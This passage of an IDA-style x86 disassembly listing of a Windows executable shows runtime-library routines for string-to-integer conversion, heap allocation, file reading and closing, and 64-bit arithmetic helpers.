add eax, 4
test [eax], eax
xchg eax, esp
mov eax, [eax]
push eax
retn
; ---------------------------------------------------------------------------
loc_416B35: ; CODE XREF: sub_416B20+5�j
push ecx
lea ecx, [esp+4+arg_0]
loc_416B3A: ; CODE XREF: sub_416B20+2C�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_416B3A
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_416B20 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416B5D proc near ; CODE XREF: sub_401E55+46�p
; sub_401ECD+67�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_1C], eax
push edi
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_4189AC
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_416BAE
dec [ebp+var_1C]
js short loc_416BA1
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_416BAE
; ---------------------------------------------------------------------------
loc_416BA1: ; CODE XREF: sub_416B5D+3A�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_418805
pop ecx
pop ecx
loc_416BAE: ; CODE XREF: sub_416B5D+35�j
; sub_416B5D+42�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_416B5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416BB4 proc near ; CODE XREF: sub_401F41+19�p
; sub_405CD5+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_C]
mov [ebp+var_1C], eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_4189AC
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_416C04
dec [ebp+var_1C]
js short loc_416BF7
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_416C04
; ---------------------------------------------------------------------------
loc_416BF7: ; CODE XREF: sub_416BB4+39�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_418805
pop ecx
pop ecx
loc_416C04: ; CODE XREF: sub_416BB4+34�j
; sub_416BB4+41�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_416BB4 endp
; =============== S U B R O U T I N E =======================================
sub_416C0A proc near ; CODE XREF: sub_416C92�j
; sub_42027F+36�p
arg_0 = dword ptr 4
push esi
push edi
call sub_41915F
mov edi, [eax+64h]
cmp edi, off_4323DC
jz short loc_416C23
call sub_419F8E
mov edi, eax
loc_416C23: ; CODE XREF: sub_416C0A+10�j
mov esi, [esp+8+arg_0]
loc_416C27: ; CODE XREF: sub_416C0A+43�j
cmp dword ptr [edi+28h], 1
movzx eax, byte ptr [esi]
jle short loc_416C3E
push 8
push eax
push edi
call sub_419D8B
add esp, 0Ch
jmp short loc_416C48
; ---------------------------------------------------------------------------
loc_416C3E: ; CODE XREF: sub_416C0A+24�j
mov ecx, [edi+48h]
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
loc_416C48: ; CODE XREF: sub_416C0A+32�j
test eax, eax
jz short loc_416C4F
inc esi
jmp short loc_416C27
; ---------------------------------------------------------------------------
loc_416C4F: ; CODE XREF: sub_416C0A+40�j
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, 2Dh
mov edx, ecx
jz short loc_416C5F
cmp ecx, 2Bh
jnz short loc_416C63
loc_416C5F: ; CODE XREF: sub_416C0A+4E�j
movzx ecx, byte ptr [esi]
inc esi
loc_416C63: ; CODE XREF: sub_416C0A+53�j
xor eax, eax
loc_416C65: ; CODE XREF: sub_416C0A+7C�j
cmp ecx, 30h
jl short loc_416C74
cmp ecx, 39h
jg short loc_416C74
sub ecx, 30h
jmp short loc_416C77
; ---------------------------------------------------------------------------
loc_416C74: ; CODE XREF: sub_416C0A+5E�j
; sub_416C0A+63�j
or ecx, 0FFFFFFFFh
loc_416C77: ; CODE XREF: sub_416C0A+68�j
cmp ecx, 0FFFFFFFFh
jz short loc_416C88
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2]
movzx ecx, byte ptr [esi]
inc esi
jmp short loc_416C65
; ---------------------------------------------------------------------------
loc_416C88: ; CODE XREF: sub_416C0A+70�j
cmp edx, 2Dh
pop edi
pop esi
jnz short locret_416C91
neg eax
locret_416C91: ; CODE XREF: sub_416C0A+83�j
retn
sub_416C0A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416C92 proc near ; CODE XREF: sub_401FDF+63�p
; sub_402B05+12�p ...
jmp sub_416C0A
sub_416C92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416C97 proc near ; CODE XREF: sub_4023C0+1C2�p
; sub_4023C0+1C8�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00416CF3 SIZE 00000015 BYTES
push 0Ch
push offset stru_42BDD8
call __SEH_prolog
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_416D02
cmp dword_482964, 3
jnz short loc_416CF3
push 4
call sub_41A166
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41A1DF
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_416CD6
push esi
push eax
call sub_41A20A
pop ecx
pop ecx
loc_416CD6: ; CODE XREF: sub_416C97+34�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_416CEA
cmp [ebp+var_1C], 0
jnz short loc_416D02
push [ebp+arg_0]
jmp short loc_416CF4
sub_416C97 endp
; =============== S U B R O U T I N E =======================================
sub_416CEA proc near ; CODE XREF: sub_416C97+43�p
; DATA XREF: .text:stru_42BDD8�o
push 4
call sub_41A0D2
pop ecx
retn
sub_416CEA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_416C97
loc_416CF3: ; CODE XREF: sub_416C97+1A�j
push esi
loc_416CF4: ; CODE XREF: sub_416C97+51�j
push 0
push dword_482960
call dword_422058 ; RtlFreeHeap
loc_416D02: ; CODE XREF: sub_416C97+11�j
; sub_416C97+4C�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_416C97
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D08 proc near ; CODE XREF: sub_416D83+B�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_42BDE8
call __SEH_prolog
mov esi, [ebp+arg_0]
cmp dword_482964, 3
jnz short loc_416D4E
cmp esi, dword_482950
ja short loc_416D4E
push 4
call sub_41A166
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41A9BE
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_416D7A
mov eax, [ebp+var_1C]
test eax, eax
jnz short loc_416D71
loc_416D4E: ; CODE XREF: sub_416D08+16�j
; sub_416D08+1E�j
test esi, esi
jnz short loc_416D53
inc esi
loc_416D53: ; CODE XREF: sub_416D08+48�j
cmp dword_482964, 1
jz short loc_416D62
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_416D62: ; CODE XREF: sub_416D08+52�j
push esi
push 0
push dword_482960
call dword_42205C ; RtlAllocateHeap
loc_416D71: ; CODE XREF: sub_416D08+44�j
call __SEH_epilog
retn
sub_416D08 endp
; =============== S U B R O U T I N E =======================================
sub_416D77 proc near ; DATA XREF: .text:stru_42BDE8�o
mov esi, [ebp+8]
sub_416D77 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416D7A proc near ; CODE XREF: sub_416D08+3A�p
push 4
call sub_41A0D2
pop ecx
retn
sub_416D7A endp
; =============== S U B R O U T I N E =======================================
sub_416D83 proc near ; CODE XREF: sub_416DAF+A�p
; sub_41797C+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_416DAC
loc_416D8A: ; CODE XREF: sub_416D83+27�j
push [esp+arg_0]
call sub_416D08
test eax, eax
pop ecx
jnz short locret_416DAE
cmp [esp+arg_4], eax
jz short locret_416DAE
push [esp+arg_0]
call sub_41AD08
test eax, eax
pop ecx
jnz short loc_416D8A
loc_416DAC: ; CODE XREF: sub_416D83+5�j
xor eax, eax
locret_416DAE: ; CODE XREF: sub_416D83+13�j
; sub_416D83+19�j
retn
sub_416D83 endp
; =============== S U B R O U T I N E =======================================
sub_416DAF proc near ; CODE XREF: sub_4023C0+B1�p
; sub_4023C0+C1�p ...
arg_0 = dword ptr 4
push dword_481314
push [esp+4+arg_0]
call sub_416D83
pop ecx
pop ecx
retn
sub_416DAF endp
; =============== S U B R O U T I N E =======================================
sub_416DC1 proc near ; CODE XREF: sub_416E0D+32�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
test byte ptr [esi+0Ch], 83h
jz short loc_416E04
push esi
call sub_41AE6C
push esi
mov edi, eax
call sub_41AE41
push dword ptr [esi+10h]
call sub_41ADA6
add esp, 0Ch
test eax, eax
jge short loc_416DF2
or edi, 0FFFFFFFFh
jmp short loc_416E04
; ---------------------------------------------------------------------------
loc_416DF2: ; CODE XREF: sub_416DC1+2A�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_416E04
push eax
call sub_416C97
and dword ptr [esi+1Ch], 0
pop ecx
loc_416E04: ; CODE XREF: sub_416DC1+D�j
; sub_416DC1+2F�j ...
and dword ptr [esi+0Ch], 0
mov eax, edi
pop edi
pop esi
retn
sub_416DC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E0D proc near ; CODE XREF: sub_4041CE+74�p
; sub_405DD1+B5�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_42BDF8
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
mov esi, [ebp+arg_0]
test byte ptr [esi+0Ch], 40h
jz short loc_416E33
and dword ptr [esi+0Ch], 0
loc_416E2A: ; CODE XREF: sub_416E0D+44�j
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_416E33: ; CODE XREF: sub_416E0D+17�j
push esi
call sub_41B092
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_416DC1
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_416E56
jmp short loc_416E2A
sub_416E0D endp
; =============== S U B R O U T I N E =======================================
sub_416E53 proc near ; DATA XREF: .text:stru_42BDF8�o
mov esi, [ebp+8]
sub_416E53 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416E56 proc near ; CODE XREF: sub_416E0D+3F�p
push esi
call sub_41B0E4
pop ecx
retn
sub_416E56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E5E proc near ; CODE XREF: sub_416F47+25�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
test edi, edi
mov ecx, edi
mov [ebp+var_8], edi
mov [ebp+arg_0], ecx
jnz short loc_416E82
xor eax, eax
jmp loc_416F2D
; ---------------------------------------------------------------------------
loc_416E82: ; CODE XREF: sub_416E5E+1B�j
push esi
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_416E96
mov eax, [esi+18h]
mov [ebp+var_4], eax
jmp short loc_416EA2
; ---------------------------------------------------------------------------
loc_416E96: ; CODE XREF: sub_416E5E+2E�j
mov [ebp+var_4], 1000h
jmp short loc_416EA2
; ---------------------------------------------------------------------------
loc_416E9F: ; CODE XREF: sub_416E5E+C5�j
mov ecx, [ebp+arg_0]
loc_416EA2: ; CODE XREF: sub_416E5E+36�j
; sub_416E5E+3F�j
test word ptr [esi+0Ch], 10Ch
jz short loc_416ED4
mov eax, [esi+4]
test eax, eax
jz short loc_416ED4
cmp ecx, eax
mov edi, ecx
jb short loc_416EB9
mov edi, eax
loc_416EB9: ; CODE XREF: sub_416E5E+57�j
push edi
push dword ptr [esi]
push ebx
call sub_41B490
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_8]
jmp short loc_416F1F
; ---------------------------------------------------------------------------
loc_416ED4: ; CODE XREF: sub_416E5E+4A�j
; sub_416E5E+51�j
cmp ecx, [ebp+var_4]
jb short loc_416F07
cmp [ebp+var_4], 0
mov eax, ecx
jz short loc_416EEA
xor edx, edx
div [ebp+var_4]
mov eax, ecx
sub eax, edx
loc_416EEA: ; CODE XREF: sub_416E5E+81�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_41B3E4
add esp, 0Ch
test eax, eax
jz short loc_416F31
cmp eax, 0FFFFFFFFh
jz short loc_416F41
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_416F1F
; ---------------------------------------------------------------------------
loc_416F07: ; CODE XREF: sub_416E5E+79�j
push esi
call sub_41B136
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_416F35
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+var_4], eax
loc_416F1F: ; CODE XREF: sub_416E5E+74�j
; sub_416E5E+A7�j
cmp [ebp+arg_0], 0
jnz loc_416E9F
mov eax, [ebp+arg_8]
loc_416F2C: ; CODE XREF: sub_416E5E+E1�j
pop esi
loc_416F2D: ; CODE XREF: sub_416E5E+1F�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416F31: ; CODE XREF: sub_416E5E+9B�j
or dword ptr [esi+0Ch], 10h
loc_416F35: ; CODE XREF: sub_416E5E+B3�j
; sub_416E5E+E7�j
mov eax, edi
sub eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
jmp short loc_416F2C
; ---------------------------------------------------------------------------
loc_416F41: ; CODE XREF: sub_416E5E+A0�j
or dword ptr [esi+0Ch], 20h
jmp short loc_416F35
sub_416E5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F47 proc near ; CODE XREF: sub_4041CE+47�p
; sub_4131EE+2F2�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 0Ch
push offset stru_42BE08
call __SEH_prolog
push [ebp+arg_C]
call sub_41B092
pop ecx
and [ebp+ms_exc.disabled], 0
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416E5E
add esp, 10h
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_416F89
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_416F47 endp
; =============== S U B R O U T I N E =======================================
sub_416F89 proc near ; CODE XREF: sub_416F47+34�p
; DATA XREF: .text:stru_42BE08�o
push dword ptr [ebp+14h]
call sub_41B0E4
pop ecx
retn
sub_416F89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F93 proc near ; CODE XREF: sub_41D4FC+34�p
; sub_41D4FC+49�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00417104 SIZE 0000003C BYTES
push 14h
push offset stru_42BE18
call __SEH_prolog
mov edi, [ebp+arg_0]
xor ebx, ebx
cmp edi, ebx
jnz short loc_416FB6
push [ebp+arg_4]
call sub_416DAF
pop ecx
jmp loc_41713A
; ---------------------------------------------------------------------------
loc_416FB6: ; CODE XREF: sub_416F93+13�j
mov esi, [ebp+arg_4]
cmp esi, ebx
jnz short loc_416FC9
push edi
call sub_416C97
pop ecx
jmp loc_417138
; ---------------------------------------------------------------------------
loc_416FC9: ; CODE XREF: sub_416F93+28�j
cmp dword_482964, 3
jnz loc_417104
loc_416FD6: ; CODE XREF: sub_416F93+158�j
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja loc_4170D3
push 4
call sub_41A166
pop ecx
mov [ebp+ms_exc.disabled], ebx
push edi
call sub_41A1DF
pop ecx
mov [ebp+var_20], eax
cmp eax, ebx
jz loc_4170A3
cmp esi, dword_482950
ja short loc_417053
push esi
push edi
push eax
call sub_41A6DF
add esp, 0Ch
test eax, eax
jz short loc_41701B
mov [ebp+var_1C], edi
jmp short loc_417053
; ---------------------------------------------------------------------------
loc_41701B: ; CODE XREF: sub_416F93+81�j
push esi
call sub_41A9BE
pop ecx
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_417053
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_417036
mov eax, esi
loc_417036: ; CODE XREF: sub_416F93+9F�j
push eax
push edi
push [ebp+var_1C]
call sub_41B490
push edi
call sub_41A1DF
mov [ebp+var_20], eax
push edi
push eax
call sub_41A20A
add esp, 18h
loc_417053: ; CODE XREF: sub_416F93+72�j
; sub_416F93+86�j ...
cmp [ebp+var_1C], ebx
jnz short loc_4170A3
cmp esi, ebx
jnz short loc_417062
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_417062: ; CODE XREF: sub_416F93+C7�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push dword_482960
call dword_42205C ; RtlAllocateHeap
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_4170A3
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_41708D
mov eax, esi
loc_41708D: ; CODE XREF: sub_416F93+F6�j
push eax
push edi
push [ebp+var_1C]
call sub_41B490
push edi
push [ebp+var_20]
call sub_41A20A
add esp, 14h
loc_4170A3: ; CODE XREF: sub_416F93+66�j
; sub_416F93+C3�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4170FB
cmp [ebp+var_20], ebx
jnz short loc_4170D3
cmp esi, ebx
jnz short loc_4170B8
xor esi, esi
inc esi
loc_4170B8: ; CODE XREF: sub_416F93+120�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push ebx
push dword_482960
call dword_42215C ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_4170D3: ; CODE XREF: sub_416F93+49�j
; sub_416F93+11C�j
mov eax, [ebp+var_1C]
cmp eax, ebx
jnz short loc_41713A
cmp dword_481314, ebx
jz short loc_41713A
push esi
call sub_41AD08
pop ecx
test eax, eax
jnz loc_416FD6
jmp short loc_417138
sub_416F93 endp
; =============== S U B R O U T I N E =======================================
sub_4170F3 proc near ; DATA XREF: .text:stru_42BE18�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
sub_4170F3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4170FB proc near ; CODE XREF: sub_416F93+114�p
push 4
call sub_41A0D2
pop ecx
retn
sub_4170FB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_416F93
loc_417104: ; CODE XREF: sub_416F93+3D�j
; sub_416F93+1A3�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_417121
cmp esi, ebx
jnz short loc_417112
xor esi, esi
inc esi
loc_417112: ; CODE XREF: sub_416F93+17A�j
push esi
push edi
push ebx
push dword_482960
call dword_42215C ; RtlReAllocateHeap
loc_417121: ; CODE XREF: sub_416F93+176�j
cmp eax, ebx
jnz short loc_41713A
cmp dword_481314, ebx
jz short loc_41713A
push esi
call sub_41AD08
pop ecx
test eax, eax
jnz short loc_417104
loc_417138: ; CODE XREF: sub_416F93+31�j
; sub_416F93+15E�j
xor eax, eax
loc_41713A: ; CODE XREF: sub_416F93+1E�j
; sub_416F93+145�j ...
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_416F93
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417140 proc near ; CODE XREF: sub_41719C+A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset stru_42BE28
call __SEH_prolog
call sub_41B9BA
mov [ebp+var_1C], eax
test eax, eax
jnz short loc_417167
call sub_41B935
mov dword ptr [eax], 18h
xor eax, eax
jmp short loc_41718C
; ---------------------------------------------------------------------------
loc_417167: ; CODE XREF: sub_417140+16�j
and [ebp+ms_exc.disabled], 0
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41B7CD
add esp, 10h
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_417192
mov eax, [ebp+var_20]
loc_41718C: ; CODE XREF: sub_417140+25�j
call __SEH_epilog
retn
sub_417140 endp
; =============== S U B R O U T I N E =======================================
sub_417192 proc near ; CODE XREF: sub_417140+44�p
; DATA XREF: .text:stru_42BE28�o
push dword ptr [ebp-1Ch]
call sub_41B0E4
pop ecx
retn
sub_417192 endp
; =============== S U B R O U T I N E =======================================
sub_41719C proc near ; CODE XREF: sub_4041CE+2A�p
; sub_405DD1+78�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_417140
add esp, 0Ch
retn
sub_41719C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4171B0 proc near ; CODE XREF: sub_402816+18D�p
; sub_4125FE+114�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_4171C9
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_4171C9: ; CODE XREF: sub_4171B0+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_4171B0 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4171E5 proc near ; CODE XREF: sub_41721D�p
mov eax, offset sub_41BE9E
mov off_432A28, eax
mov off_432A2C, offset sub_41BB18
mov off_432A30, offset sub_41BB7D
mov off_432A34, offset sub_41BADC
mov off_432A38, offset sub_41BB63
mov off_432A3C, eax
retn
sub_4171E5 endp
; =============== S U B R O U T I N E =======================================
sub_41721D proc near ; CODE XREF: sub_41827B+9�p
; DATA XREF: .text:off_432338�o
call sub_4171E5
call sub_41BF41
mov dword_48115C, eax
call sub_41BEEF
fnclex
retn
sub_41721D endp
; =============== S U B R O U T I N E =======================================
sub_417234 proc near ; CODE XREF: sub_403148+8�p
; sub_415E96+FE�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call dword_4220A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_417254
call dword_422004 ; RtlGetLastWin32Error
push eax
call sub_41B947
pop ecx
loc_417250: ; CODE XREF: sub_417234+41�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_417254: ; CODE XREF: sub_417234+D�j
test al, 1
jz short loc_417277
test [esp+arg_4], 2
jz short loc_417277
call sub_41B935
mov dword ptr [eax], 0Dh
call sub_41B93E
mov dword ptr [eax], 5
jmp short loc_417250
; ---------------------------------------------------------------------------
loc_417277: ; CODE XREF: sub_417234+22�j
; sub_417234+29�j
xor eax, eax
retn
sub_417234 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417280 proc near ; CODE XREF: sub_403162+2A�p
; sub_4189AC+60D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_4172B1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_4172F8
; ---------------------------------------------------------------------------
loc_4172B1: ; CODE XREF: sub_417280+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_4172BF: ; CODE XREF: sub_417280+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4172BF
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_4172ED
cmp edx, [esp+4+arg_4]
ja short loc_4172ED
jb short loc_4172F6
cmp eax, [esp+4+arg_0]
jbe short loc_4172F6
loc_4172ED: ; CODE XREF: sub_417280+5D�j
; sub_417280+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_4172F6: ; CODE XREF: sub_417280+65�j
; sub_417280+6B�j
xor ebx, ebx
loc_4172F8: ; CODE XREF: sub_417280+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_417280 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417320 proc near ; CODE XREF: sub_403266+5F�p
; sub_403266+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_417341
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_417341: ; CODE XREF: sub_417320+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41735D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41735D: ; CODE XREF: sub_417320+27�j
or eax, eax
jnz short loc_417379
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_4173BA
; ---------------------------------------------------------------------------
loc_417379: ; CODE XREF: sub_417320+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_417387: ; CODE XREF: sub_417320+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_417387
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_4173B5
cmp edx, [esp+0Ch+arg_4]
ja short loc_4173B5
jb short loc_4173B6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_4173B6
loc_4173B5: ; CODE XREF: sub_417320+85�j
; sub_417320+8B�j
dec esi
loc_4173B6: ; CODE XREF: sub_417320+8D�j
; sub_417320+93�j
xor edx, edx
mov eax, esi
loc_4173BA: ; CODE XREF: sub_417320+57�j
dec edi
jnz short loc_4173C4
neg edx
neg eax
sbb edx, 0
loc_4173C4: ; CODE XREF: sub_417320+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_417320 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4173D0 proc near ; CODE XREF: sub_403810+C6�p
; sub_403810+133�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_417450
mov dh, [ecx+1]
test dh, dh
jz short loc_41743D
loc_4173E8: ; CODE XREF: sub_4173D0+58�j
; sub_4173D0+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
